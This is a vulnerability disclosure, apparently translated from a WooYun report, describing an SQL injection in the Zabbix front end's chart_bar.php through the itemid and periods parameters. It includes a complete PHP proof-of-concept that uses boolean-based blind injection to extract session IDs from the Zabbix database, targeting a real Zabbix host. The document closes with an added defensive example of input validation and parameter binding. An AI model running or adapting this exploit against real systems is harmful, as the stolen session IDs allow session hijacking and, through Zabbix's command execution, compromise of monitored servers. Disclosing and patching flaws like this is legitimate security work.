Zabbix front-end SQL injection 0day

from http://wooyun.org/bugs/wooyun-2014-072075

The Zabbix front end contains an SQL injection vulnerability. Because the Zabbix front end can execute commands on the Zabbix server and on agents, this vulnerability has very serious consequences.

At line 163 of /chart_bar.php, a value itemid is taken from GET, POST or COOKIE input:

$itemid = $item['itemid'];

This parameter ultimately ends up in the SQL query (screenshot: http://wooyun.org/upload/201408/121704045cbce0027d8f0fd26109cf834a6694d5.jpg).

The $periods parameter in the same file has the same problem and leads to the same SQL injection vulnerability.

Below is the PoC.

<?php
// Boolean-based blind extraction through the items[][itemid] parameter of chart_bar.php.
run_sql("SELECT sessionid from zabbix.sessions where userid in (select userid from zabbix.users) limit 1");
echo "\n";

function run_sql($sql) {
    $url = 'http://www.zabbix.org/zabbix/chart_bar.php';
    // Reference response length for the condition "6 and 1=2"; a response that is
    // more than 200 bytes shorter than this is treated as a hit.
    $data = 'config=1&items[][itemid]=' . rawurlencode('6 and 1=2#');
    $true = strlen(post($url, $data));
    // find the result length
    $length = 0;
    for ($i = 0; $i <= 32; $i++) {
        //echo $i."\r\n";
        $data = 'config=1&items[][itemid]=' . rawurlencode('6 and length((' . $sql . ')) = ' . $i . '#');
        $test = strlen(post($url, $data));
        if ($test < ($true - 200)) {
            $length = $i;
            break;
        }
    }
    echo 'Length:' . $length . "\r\n";
    echo 'Result:';
    $chars = array();
    if ($length) {
        // Recover the result one character at a time by comparing ord() of each position.
        for ($l = 0; $l < $length; $l++) {
            $char_list = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@.?-_\/!$%^&*()~';
            for ($c = 0; $c < strlen($char_list); $c++) {
                $data = 'config=1&items[][itemid]=' . rawurlencode('6 and ord(substring((' . $sql . '),' . ($l + 1) . ',1)) = ' . ord($char_list[$c]) . '#');
                $test = strlen(post($url, $data));
                if ($test < ($true - 200)) {
                    echo $char_list[$c];
                    $chars[$l] = $char_list[$c];
                    break;
                }
            }
        }
    }
}

// Send a POST request with cURL and return the response body.
function post($uri, $data) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $uri);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $return = curl_exec($ch);
    curl_close($ch);
    return $return;
}
?>
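As an added example (not Zabbix's own code; it assumes a PDO connection and a hypothetical items table with itemid and name columns), this is the shape of the fix for the itemid handling described above: refuse anything that is not a plain numeric ID before it can reach a query, and bind the IDs as parameters so a value such as "6 and 1=2#" can never become part of the SQL text.

```php
<?php
// Added example, not Zabbix code: validate items[][itemid] values and bind them.

// Accept the request shape the vulnerable endpoint took (items[][itemid]=...)
// and return only well-formed positive integer IDs; anything else is rejected.
function validate_item_ids(array $items): array {
    $ids = [];
    foreach ($items as $item) {
        $raw = $item['itemid'] ?? null;
        // ctype_digit() accepts only a non-empty string of ASCII digits, so
        // "6 and 1=2#" or "6 and length((...))=1#" fail here, before any SQL.
        if (!is_string($raw) || !ctype_digit($raw)) {
            throw new InvalidArgumentException('itemid must be a numeric ID');
        }
        $id = (int) $raw;
        if ($id <= 0) {
            throw new InvalidArgumentException('itemid must be positive');
        }
        $ids[] = $id;
    }
    return $ids;
}

// Parameterised lookup: the IDs travel as bound values, never as SQL text.
// Assumes a hypothetical "items" table; Zabbix's own DB layer differs.
function fetch_items(PDO $db, array $ids): array {
    if (empty($ids)) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT itemid, name FROM items WHERE itemid IN ($placeholders)");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample input mirroring the PoC's request shape.
$good = [['itemid' => '6']];
$bad  = [['itemid' => '6 and 1=2#']];

print_r(validate_item_ids($good));
try {
    validate_item_ids($bad);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

The same check applies to $periods and to any other value that reaches SQL from GET, POST or COOKIE; superglobals are never trusted to hold integers.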
